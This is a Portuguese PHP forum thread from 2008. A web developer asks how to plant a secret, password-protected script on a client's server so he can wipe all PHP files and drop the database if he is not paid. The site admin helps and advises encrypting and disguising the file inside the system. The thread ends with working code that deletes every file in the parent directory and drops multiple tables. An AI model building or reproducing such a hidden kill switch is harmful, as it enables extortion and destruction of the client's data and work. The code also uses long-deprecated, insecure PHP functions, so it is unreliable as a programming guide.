Fóruns sobre PHP, JavaScript, HTML, MySQLi, jQuery, Banco de Dados, CSS


Moderador: web

 
Mais de 100 postagens
Mais de 100 postagens
Tópico Autor
Mensagens: 411
Sexo: Masculino
Localização: VOLTA REDONDA RJ
Contato:

Deletar todos os arquivos

12-11-2008 12:32

Bom dia.
Gostaria de saber se é possível criar um scritp onde eu possa deletar todos os arquivos com extenções .php e banco de dados dentro do meu servidor .

Sei que pode parecer estranho este tópico mas acredite, seria uma questão de segurança de autoria de trabalho .
:reading
0
 
Avatar do usuário
ADMIN
ADMIN
Mensagens: 17743
Nome: Kleber
Descrição do site: Onde você encontra scripts grátis para o seu site
Sexo: Masculino
Localização: RJ / RJ / Brasil
Contato:

Deletar todos os arquivos

12-11-2008 13:09

Se você tem acesso ao servidor é simples, você tem acesso?
0
A melhor hospedagem para o seu site HostGator!
 
Mais de 100 postagens
Mais de 100 postagens
Tópico Autor
Mensagens: 411
Sexo: Masculino
Localização: VOLTA REDONDA RJ
Contato:

Deletar todos os arquivos

12-11-2008 15:37

Sim, tenho acesso.
É o seguinte, quero criar um arquivo secreto onde seria administrado por senha e BD é claro. e que ao acessar este teria acesso a deletar o que eu quisesse , tando os arquivos quanto o BD .
É uma questão para segurança do meu trabalho , isto pq , embora tenha acesso ao servidor hoje , amanhã posso não ter e deixar de receber pelo trb realizado , logo , bom vc enterndeu a situação é claro .
Acredito que seja algo parecido ou até mesmo igual aos casos de deletar arquivos do BD q normalmente usamos .
0
 
Avatar do usuário
ADMIN
ADMIN
Mensagens: 17743
Nome: Kleber
Descrição do site: Onde você encontra scripts grátis para o seu site
Sexo: Masculino
Localização: RJ / RJ / Brasil
Contato:

Deletar todos os arquivos

12-11-2008 16:42

Acho que o melhor seria criptografar os arquivos do seu sistema, tem alguns sites e softwares que fazem isso.

Eu vou indicar algumas ferramentas para te dar uma idéia do que precisa

Listar e deletar arquivos
http://www.codigosnaweb.com/forum/viewt ... f=1&t=1584
Você vai usar o unlink() ao invés do echo, para deletar o arquivo

Para deletar uma tabela o comando é
DROP TABLE suatabela
Pode até anexar o DROP logo após deletar os arquivos.

Para login
http://www.codigosnaweb.com/forum/viewt ... ?f=15&t=85
Esse é um script bem simples para login com autenticação

Um dica que dou é criar esse arquivo que vai fazer todo processo, e incluir nele também algo do sistema, ai você deixa criptografado o arquivo.
0
A melhor hospedagem para o seu site HostGator!
 
Mais de 100 postagens
Mais de 100 postagens
Tópico Autor
Mensagens: 411
Sexo: Masculino
Localização: VOLTA REDONDA RJ
Contato:

Deletar todos os arquivos

15-11-2008 16:04

Boa Tarde , web, desculpa o simiço ...

Entendi por partes .
A parte de login eu ja tenho , valeu.
Quanto ao caso da listagem , funciona perfeitamente.
A da tabela deixei assim ...

<?php $con = mysql_connect ('localhost', 'user', 'senha'); mysql_select_db('banco'); $sql = mysql_query ("Drop Table tabela"); if ($sql)   echo "Tabela removida.";   else     echo "Erro ao apagar tabela."; mysql_close($con); ?>

Agora como eu coloco um botão para deletar e pedir confirmação, tipo ...

function verify_removal(ARQUIVOS) {         msg = "Você tem certeza de que deseja remover estes arquivos do sistema?";         if(confirm(msg)) {                 window.location='list.php;         } else {                 return false;         } }


<input class='texto2' type=button value='Apagar' onClick="verify_removal(<?=$codigo?>);">

Tanto pra tabela quanto os arquivos .
0
 
Avatar do usuário
ADMIN
ADMIN
Mensagens: 17743
Nome: Kleber
Descrição do site: Onde você encontra scripts grátis para o seu site
Sexo: Masculino
Localização: RJ / RJ / Brasil
Contato:

Deletar todos os arquivos

15-11-2008 16:21

Você misturou ai PHP com JavaScript, precisa de uma confirmação antes do delete no JavaScript ou no PHP?
0
A melhor hospedagem para o seu site HostGator!
 
Mais de 100 postagens
Mais de 100 postagens
Tópico Autor
Mensagens: 411
Sexo: Masculino
Localização: VOLTA REDONDA RJ
Contato:

Deletar todos os arquivos

15-11-2008 18:10

Perdão pela mistulança ( misturada + lambança ).
Eu preciso é que na lista tenha o botão para deletar o arquivo .
Mesmo sem confirmação , que delete ao clicar e retorne para a pagina da lista .
0
 
Avatar do usuário
ADMIN
ADMIN
Mensagens: 17743
Nome: Kleber
Descrição do site: Onde você encontra scripts grátis para o seu site
Sexo: Masculino
Localização: RJ / RJ / Brasil
Contato:

Deletar todos os arquivos

15-11-2008 18:41

Você pode usar um link para esse arquivo que tem um drop, quando acessar o arquivo, se o drop for com sucesso ao invés de mostrar a frase usar um header location que irá mandar para outra página.
0
A melhor hospedagem para o seu site HostGator!
 
Mais de 100 postagens
Mais de 100 postagens
Tópico Autor
Mensagens: 411
Sexo: Masculino
Localização: VOLTA REDONDA RJ
Contato:

Deletar todos os arquivos

16-11-2008 14:06

Resolvi dessa forma ...

<?php  $username = "xxxxxx"; // username para entrar na página  $password = "xxxxxx"; // password para entrar na página  if ($PHP_AUTH_USER != $username || $PHP_AUTH_PW != $password) {  header("WWW-Authenticate: basic realm='área protegida por senha'");  header("HTTP/1.0 401 Unauthorized");  print " username ou senha incorretos";  exit;  } else {  foreach (glob("../*.*") as $arquivo) {  unlink($arquivo); }  } ?>

e no caso das tabelas ....

<?php require 'config.php'; $username = "xxxxx"; // username para entrar na página  $password = "xxxxx"; // password para entrar na página  if ($PHP_AUTH_USER != $username || $PHP_AUTH_PW != $password) {  header("WWW-Authenticate: basic realm='área protegida por senha'");  header("HTTP/1.0 401 Unauthorized");  print " username ou senha incorretos";  exit;  } else {  $con = mysql_connect ('locahost',usuario','senha'); mysql_select_db('name'); $sql = mysql_query ("DROP TABLE `tabela1`, `tabela2`, `tabela3`, `tabela4`;"); if ($sql)   echo "Tabela deletado.";   else     echo "Erro ao apagar tabela."; mysql_close($con); } ?>

Lembro que os arquivos e diretórios tem q estar com permissão.

Sempre que resolvo, gosto de postar o resultado, pois sou muito bem atendido neste forum.
0

Quem está online

Usuários navegando neste fórum: Nenhum usuário registrado